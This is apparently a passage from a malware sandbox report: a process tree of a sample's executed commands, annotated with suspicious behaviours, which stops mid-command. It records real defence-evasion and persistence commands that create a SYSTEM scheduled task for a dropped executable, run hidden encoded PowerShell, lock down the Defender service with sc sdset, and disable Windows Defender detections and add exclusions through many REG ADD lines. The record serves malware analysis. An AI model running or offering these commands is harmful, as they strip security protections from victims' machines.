C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwKBwqZYjkqxftWshF" /SC once /ST 07:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\HOZCbqC.exe\" cj /gcsite_idisd 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2912
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxuDNDCYP"6⤵PID:2044
-
-
-
-
-
C:\Users\Admin\Pictures\tLvV5rbdoB7aj6jWYBj2thyy.exe"C:\Users\Admin\Pictures\tLvV5rbdoB7aj6jWYBj2thyy.exe" /VERYSILENT3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Users\Admin\AppData\Local\Temp\is-QCTSP.tmp\tLvV5rbdoB7aj6jWYBj2thyy.tmp"C:\Users\Admin\AppData\Local\Temp\is-QCTSP.tmp\tLvV5rbdoB7aj6jWYBj2thyy.tmp" /SL5="$3C0230,831488,831488,C:\Users\Admin\Pictures\tLvV5rbdoB7aj6jWYBj2thyy.exe" /VERYSILENT4⤵PID:4368
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4552 -ip 45521⤵PID:1204
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4552 -ip 45521⤵PID:3344
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4552 -ip 45521⤵PID:4504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4552 -ip 45521⤵PID:392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4952 -ip 49521⤵PID:1900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4552 -ip 45521⤵PID:1112
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4552 -ip 45521⤵PID:1544
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4952 -ip 49521⤵PID:2088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4552 -ip 45521⤵PID:4432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4952 -ip 49521⤵PID:3508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4952 -ip 49521⤵PID:2852
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4952 -ip 49521⤵PID:2860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4952 -ip 49521⤵PID:900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4952 -ip 49521⤵PID:5012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4552 -ip 45521⤵PID:540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4952 -ip 49521⤵PID:5008
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4952 -ip 49521⤵PID:3028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4552 -ip 45521⤵PID:4748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4952 -ip 49521⤵PID:1100
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4952 -ip 49521⤵PID:1784
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4552 -ip 45521⤵PID:392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4952 -ip 49521⤵PID:4908
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4552 -ip 45521⤵PID:388
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4952 -ip 49521⤵PID:3076
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4552 -ip 45521⤵PID:3284
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4552 -ip 45521⤵PID:1472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4552 -ip 45521⤵PID:2040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4952 -ip 49521⤵PID:2640
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4552 -ip 45521⤵PID:1572
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4952 -ip 49521⤵PID:1040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4552 -ip 45521⤵PID:3956
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4552 -ip 45521⤵PID:3892
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4952 -ip 49521⤵PID:3432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4552 -ip 45521⤵PID:2592
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4552 -ip 45521⤵PID:4284
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4952 -ip 49521⤵PID:3148
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1092 -ip 10921⤵PID:4624
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3184 -ip 31841⤵PID:4164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1092 -ip 10921⤵PID:4324
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3184 -ip 31841⤵PID:4032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1092 -ip 10921⤵PID:4752
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1092 -ip 10921⤵PID:3308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3184 -ip 31841⤵PID:2884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3184 -ip 31841⤵PID:2040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3184 -ip 31841⤵PID:1376
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3184 -ip 31841⤵PID:4164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1092 -ip 10921⤵PID:3572
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1092 -ip 10921⤵PID:4624
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:3272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1092 -ip 10921⤵PID:1936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3184 -ip 31841⤵PID:2176
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1092 -ip 10921⤵PID:4384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3184 -ip 31841⤵PID:2080
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3184 -ip 31841⤵PID:3380
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1092 -ip 10921⤵PID:548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3184 -ip 31841⤵PID:3256
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4384 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2656
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1960 -ip 19601⤵PID:4272
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1960 -ip 19601⤵PID:900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1960 -ip 19601⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
PID:4368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1960 -ip 19601⤵PID:4868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1960 -ip 19601⤵PID:4972
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1960 -ip 19601⤵PID:3668
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3792
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1960 -ip 19601⤵PID:1840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3184 -ip 31841⤵PID:2132
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)2⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:3276
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1960 -ip 19601⤵PID:4932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1960 -ip 19601⤵PID:3632
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3184 -ip 31841⤵PID:3380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3284
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040754081\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040754081\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x252614,0x252620,0x25262c1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4396
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4752
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1960 -ip 19601⤵PID:1812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1960 -ip 19601⤵PID:5056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1960 -ip 19601⤵PID:2720
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1960 -ip 19601⤵PID:4936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1960 -ip 19601⤵PID:4652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1960 -ip 19601⤵PID:1204
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1960 -ip 19601⤵PID:3092
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2896
-
C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\HOZCbqC.exeC:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\HOZCbqC.exe cj /gcsite_idisd 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4756 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1324 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1840
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4012
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:4604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:2888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:3956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:3256
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:4684
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FohpjzYDshfCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FohpjzYDshfCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IoHaAJhEDYhU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IoHaAJhEDYhU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KCGdmeQdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KCGdmeQdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hgFvgKbJayUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hgFvgKbJayUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uqeRQcQeSVSWnHVB\" /t REG_DWORD /d 0 /reg:32;REG ADD 